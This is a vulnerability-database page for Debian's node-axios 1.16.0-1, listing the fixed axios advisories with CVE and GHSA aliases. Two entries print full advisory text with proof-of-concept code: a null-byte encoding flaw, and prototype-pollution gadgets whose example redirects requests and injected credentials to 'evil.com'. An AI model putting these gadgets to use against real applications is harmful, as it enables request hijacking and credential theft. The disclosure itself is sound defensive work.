Search for packages
| purl | pkg:deb/debian/node-axios@1.16.0-1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| This package is not known to be affected by vulnerabilities. | ||
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-37kj-pzyt-8be6 | Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service. |
CVE-2026-25639
GHSA-43fc-jf86-j433 |
| VCID-4b7a-22xk-gbh9 | axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data |
CVE-2026-42039
GHSA-62hf-57xw-28j9 |
| VCID-5kg1-k416-dfc1 | Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams # Vulnerability Disclosure: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams ## Summary The `encode()` function in `lib/helpers/AxiosURLSearchParams.js` contains a character mapping (`charMap`) at line 21 that **reverses** the safe percent-encoding of null bytes. After `encodeURIComponent('\x00')` correctly produces the safe sequence `%00`, the charMap entry `'%00': '\x00'` converts it back to a raw null byte. This is a clear encoding defect: every other charMap entry encodes in the safe direction (literal → percent-encoded), while this single entry decodes in the opposite (dangerous) direction. **Severity:** Low (CVSS 3.7) **Affected Versions:** All versions containing this charMap entry **Vulnerable Component:** `lib/helpers/AxiosURLSearchParams.js:21` ## CWE - **CWE-626:** Null Byte Interaction Error (Poison Null Byte) - **CWE-116:** Improper Encoding or Escaping of Output ## CVSS 3.1 **Score: 3.7 (Low)** Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N` | Metric | Value | Justification | |---|---|---| | Attack Vector | Network | Attacker controls input parameters remotely | | Attack Complexity | High | Standard axios request flow (`buildURL`) uses its own `encode` function which does NOT have this bug. Only triggered via direct `AxiosURLSearchParams.toString()` without an encoder, or via custom `paramsSerializer` delegation | | Privileges Required | None | No authentication needed | | User Interaction | None | No user interaction required | | Scope | Unchanged | Impact limited to HTTP request URL | | Confidentiality | None | No confidentiality impact | | Integrity | Low | Null byte in URL can cause truncation in C-based backends, but requires a vulnerable downstream parser | | Availability | None | No availability impact | ## Vulnerable Code **File:** `lib/helpers/AxiosURLSearchParams.js`, lines 13-26 ```javascript function encode(str) { const charMap = { '!': '%21', // literal → encoded (SAFE direction) "'": '%27', // literal → encoded (SAFE direction) '(': '%28', // literal → encoded (SAFE direction) ')': '%29', // literal → encoded (SAFE direction) '~': '%7E', // literal → encoded (SAFE direction) '%20': '+', // standard transformation (SAFE) '%00': '\x00', // LINE 21: encoded → raw null byte (UNSAFE direction!) }; return encodeURIComponent(str).replace(/[!'()~]|%20|%00/g, function replacer(match) { return charMap[match]; }); } ``` ### Why the Standard Flow Is NOT Affected ```javascript // buildURL.js:36 — uses its OWN encode function (lines 14-20), not AxiosURLSearchParams's const _encode = (options && options.encode) || encode; // buildURL's encode // buildURL.js:53 — passes buildURL's encode to AxiosURLSearchParams new AxiosURLSearchParams(params, _options).toString(_encode); // external encoder used // AxiosURLSearchParams.js:48 — when encoder is provided, internal encode is NOT used const _encode = encoder ? function(value) { return encoder.call(this, value, encode); } : encode; // ^^^^^^ // internal encode passed as 2nd arg but only used if // the external encoder explicitly delegates to it ``` ## Proof of Concept ```javascript import AxiosURLSearchParams from './lib/helpers/AxiosURLSearchParams.js'; import buildURL from './lib/helpers/buildURL.js'; // Test 1: Direct AxiosURLSearchParams (VULNERABLE path) const params = new AxiosURLSearchParams({ file: 'test\x00.txt' }); const result = params.toString(); // NO encoder → uses internal encode with charMap console.log('Direct toString():', JSON.stringify(result)); // Output: "file=test\u0000.txt" (contains raw null byte) console.log('Hex:', Buffer.from(result).toString('hex')); // Output: 66696c653d74657374002e747874 (00 = null byte) // Test 2: Via buildURL (NOT vulnerable — standard axios flow) const url = buildURL('http://example.com/api', { file: 'test\x00.txt' }); console.log('Via buildURL:', url); // Output: http://example.com/api?file=test%00.txt (%00 preserved safely) ``` ## Verified PoC Output ``` Direct toString(): "file=test\u0000.txt" Contains raw null byte: true Hex: 66696c653d74657374002e747874 Via buildURL: http://example.com/api?file=test%00.txt Contains raw null byte: false Contains safe %00: true ``` ## Impact Analysis **Primary impact is limited** because the standard axios request flow is not affected. However: - **Direct API users:** Applications using `AxiosURLSearchParams` directly for custom serialization are affected - **Custom paramsSerializer:** A `paramsSerializer.encode` that delegates to the internal encoder triggers the bug - **Code defect signal:** The directional inconsistency in charMap is a clear coding error with no legitimate use case If null bytes reach a downstream C-based parser, impacts include URL truncation, WAF bypass, and log injection. ## Recommended Fix Remove the `%00` entry from charMap and update the regex: ```javascript function encode(str) { const charMap = { '!': '%21', "'": '%27', '(': '%28', ')': '%29', '~': '%7E', '%20': '+', // REMOVED: '%00': '\x00' }; return encodeURIComponent(str).replace(/[!'()~]|%20/g, function replacer(match) { // ^^^^ removed |%00 return charMap[match]; }); } ``` ## Resources - [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html) - [CWE-116: Improper Encoding or Escaping of Output](https://cwe.mitre.org/data/definitions/116.html) - [OWASP: Embedding Null Code](https://owasp.org/www-community/attacks/Embedding_Null_Code) - [Axios GitHub Repository](https://github.com/axios/axios) ## Timeline | Date | Event | |---|---| | 2026-04-15 | Vulnerability discovered during source code audit | | 2026-04-16 | Report revised: documented standard-flow limitation, corrected CVSS | | TBD | Report submitted to vendor via GitHub Security Advisory | |
CVE-2026-42040
GHSA-xhjh-pmcv-23jw |
| VCID-6ru1-uamj-5ud3 | axios: Axios: HTTP Transport Hijacking via Prototype Pollution |
CVE-2026-42033
GHSA-pf86-5x62-jrwf |
| VCID-8a5f-cd5t-mucc | axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget |
CVE-2026-42044
GHSA-3w6x-2g7m-8v23 |
| VCID-axy8-kmka-pugw | Axios is vulnerable to DoS attack through lack of data size check When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`. |
CVE-2025-58754
GHSA-4hjh-wcwx-xvwj |
| VCID-gp41-4j8d-37ce | axios: Axios: Information disclosure due to `no_proxy` bypass |
CVE-2026-42038
GHSA-m7pr-hjqh-92cm |
| VCID-hadc-5d2f-gqe6 | axios: Node.js: Axios: Information disclosure via CRLF injection in multipart Content-Type header |
CVE-2026-42037
GHSA-445q-vr5w-6q77 |
| VCID-jvs6-8bva-nqb3 | axios: Axios: Denial of Service via unbounded stream consumption when 'responseType: 'stream'' is used |
CVE-2026-42036
GHSA-vf2m-468p-8v99 |
| VCID-kwj2-mk8c-4fef | axios: Axios: Remote Code Execution via Prototype Pollution escalation |
CVE-2026-40175
GHSA-fvcv-3m26-pcqx |
| VCID-nw25-3vx3-73bg | axios: Axios: Denial of Service via HTTP/2 session cleanup logic state corruption |
CVE-2026-39865
GHSA-qj83-cq47-w5f8 |
| VCID-rusx-pwdw-zqcj | Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking ## Summary Five config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. ## Affected Properties 1. **`config.auth`** (`lib/adapters/http.js` line 617) Injects attacker-controlled `Authorization` header on all requests. 2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server. 3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon). 4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects. 5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests. ## Proof of Concept ```javascript const axios = require('axios'); // Prototype pollution from a vulnerable dependency in the same process Object.prototype.auth = { username: 'attacker', password: 'exfil' }; Object.prototype.baseURL = 'https://evil.com'; await axios.get('/api/users'); // Request is sent to: https://evil.com/api/users // With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw= // Attacker receives both the request and injected credentials ``` ## Impact - **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers. - **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server. - **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments. - **Code execution:** Attacker-supplied functions execute during HTTP redirects. - **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling. ## Root Cause `mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values. The `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection. ## Suggested Fix Apply the existing `own()` helper to all affected properties: ```javascript const configAuth = own('auth'); if (configAuth) { const username = configAuth.username || ''; const password = configAuth.password || ''; auth = username + ':' + password; } ``` Same pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`. |
CVE-2026-42264
GHSA-q8qp-cvcw-x6jj |
| VCID-td7u-cct6-bud6 | axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization |
CVE-2025-62718
GHSA-3p68-rc4w-qgx5 |
| VCID-vzqt-dj1z-bqa6 | axios: Axios: Arbitrary HTTP header injection via prototype pollution |
CVE-2026-42035
GHSA-6chq-wfr3-2hj9 |
| VCID-xdas-dhtb-nuge | axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling |
CVE-2026-42041
GHSA-w9j2-pvgh-6h63 |
| VCID-xg1x-4spz-jucn | axios: Axios: XSRF token bypass leading to information disclosure |
CVE-2026-42042
GHSA-xx6v-rp6x-q39c |
| VCID-yu5y-e4bk-zyfp | axios: Axios: Denial of Service via oversized streamed uploads bypassing body limits |
CVE-2026-42034
GHSA-5c9x-8gcm-mpgx |
| VCID-z5pf-pqcd-ckas | axios: Axios: NO_PROXY bypass via crafted URL |
CVE-2026-42043
GHSA-pmwg-cvhr-8vh7 |